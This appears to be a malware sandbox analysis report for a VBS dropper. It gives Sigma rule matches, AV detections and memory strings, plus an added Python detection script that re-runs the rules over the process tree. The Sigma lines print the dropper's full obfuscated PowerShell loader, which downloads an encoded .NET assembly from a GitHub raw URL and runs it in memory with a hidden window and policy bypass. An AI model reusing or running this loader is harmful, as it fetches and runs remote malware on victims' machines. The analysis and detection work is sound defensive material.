'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64Strin
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs", ProcessId: 6644, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64Strin
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". 
( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnK
No Suricata rule has matched
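The Sigma matches above each key on one or two process-creation fields: parent and child image for the WScript dropper rules, `-executionpolicy bypass` for the policy rules, `FromBase64String` for the base64 rule, `$env:COMSPEC[...]` indexing for the CrackMapExec-obfuscation rule, and `ptth` for the reversed-command rule. The Python below is an added example (not from the report or from the Sigma project) that runs the same checks over events constructed from the process tree above: PIDs, parent PIDs and image paths are the report's, the command lines are shortened to the parts the rules key on, and the wscript.exe parent image, which the report leaves empty, stays empty. It also walks the parent chain so the third process is flagged for the wscript -> powershell -> powershell nesting, not only for its own command line.

```python
"""Process-creation checks that reproduce the Sigma matches listed above, run
over events constructed from this report's process tree. PIDs, parent PIDs and
image paths are the report's; command lines are shortened to the parts the
rules key on. Added example, not part of the report."""
import re

PS_IMAGE = re.compile(r"\\(powershell|pwsh)\.exe$", re.IGNORECASE)
SCRIPT_HOST = re.compile(r"\\(wscript|cscript)\.exe$", re.IGNORECASE)
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

EVENTS = [  # constructed from the process tree; not a real log export
    {"pid": 6644, "ppid": 4056, "parent_image": "",  # report lists no parent image
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs"'},
    {"pid": 2980, "ppid": 6644, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": PS_PATH,
     # base64 blob cut to its first 44 characters
     "cmdline": f'"{PS_PATH}" -command $Codigo = '
                "'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycp';"
                "$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));"
                "powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"},
    {"pid": 7304, "ppid": 2980, "parent_image": PS_PATH, "image": PS_PATH,
     # middle of the '+'-concatenated payload omitted
     "cmdline": f'"{PS_PATH}" -windowstyle hidden -executionpolicy bypass -NoProfile -command '
                "\". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'"
                "+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI)')"
                "-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))\""},
]


def check_event(ev: dict) -> list:
    """Return the rule names that fire for one process-creation event."""
    cmd, hits = ev["cmdline"], []
    if SCRIPT_HOST.search(ev["image"]) and re.search(r"\.(vbs|vbe|js|jse|wsf)\b", cmd, re.I):
        hits.append("script_host_executes_script_file")
    if not PS_IMAGE.search(ev["image"]):
        return hits
    if SCRIPT_HOST.search(ev["parent_image"]):
        hits.append("wscript_starts_powershell")
    # PowerShell accepts unambiguous prefixes of its switches, so -ep and -exec count too
    if re.search(r"-(ex\w*|ep)\s+bypass", cmd, re.I):
        hits.append("execution_policy_bypass")
    if re.search(r"-w(indowstyle)?\s+hidden", cmd, re.I):
        hits.append("hidden_window")
    if re.search(r"FromBase64String\s*\(", cmd, re.I):
        hits.append("base64_decode_in_cmdline")
    if re.search(r"\$env:comspec\[[\d,\s]+\]", cmd, re.I):
        hits.append("comspec_index_obfuscation")
    if len(re.findall(r"'\s*\+\s*'", cmd)) >= 10 or re.search(r"\[char\]\s*\d+", cmd, re.I):
        hits.append("string_concat_or_char_obfuscation")
    if re.search(r"ptth", cmd, re.I):  # 'http' backwards; a loose contains-match like the Sigma rule
        hits.append("reversed_command_fragment")
    return hits


def spawn_chain(events: list, pid: int) -> list:
    """Image basenames from pid up through every ancestor present in the events."""
    by_pid = {ev["pid"]: ev for ev in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"].rsplit("\\", 1)[-1].lower())
        pid = by_pid[pid]["ppid"]
    return chain


def triage(events: list) -> dict:
    """pid -> findings; the nesting finding is attached to the innermost PowerShell."""
    findings = {ev["pid"]: check_event(ev) for ev in events}
    for ev in events:
        if spawn_chain(events, ev["pid"])[:3] == ["powershell.exe", "powershell.exe", "wscript.exe"]:
            findings[ev["pid"]].append("script_host_to_nested_powershell_chain")
    return findings


if __name__ == "__main__":
    for pid, hits in triage(EVENTS).items():
        print(pid, hits)
```

Note which rule fires where: `FromBase64String` matches only PID 2980, because in PID 7304 the same call is split across `'+'` fragments (`']::FromB'+'a'+'s'+'e64S'+'tring'`). Any detection that depends on a contiguous keyword needs either the parent's command line, as here, or PowerShell script block logging (Event ID 4104), which records the reassembled text that the engine actually runs.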


AV Detection

Source: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt | Virustotal: Detection: 6%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.4% probability
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000006.00000002.1391686254.00007FFAAC7A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ows\dll\System.pdbsv source: powershell.exe, 00000006.00000002.1382179143.000001776F323000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb9 source: powershell.exe, 00000006.00000002.1382179143.000001776F389000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32h source: powershell.exe, 00000006.00000002.1348469263.00000177554C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.1382179143.000001776F389000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000006.00000002.1391686254.00007FFAAC7A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
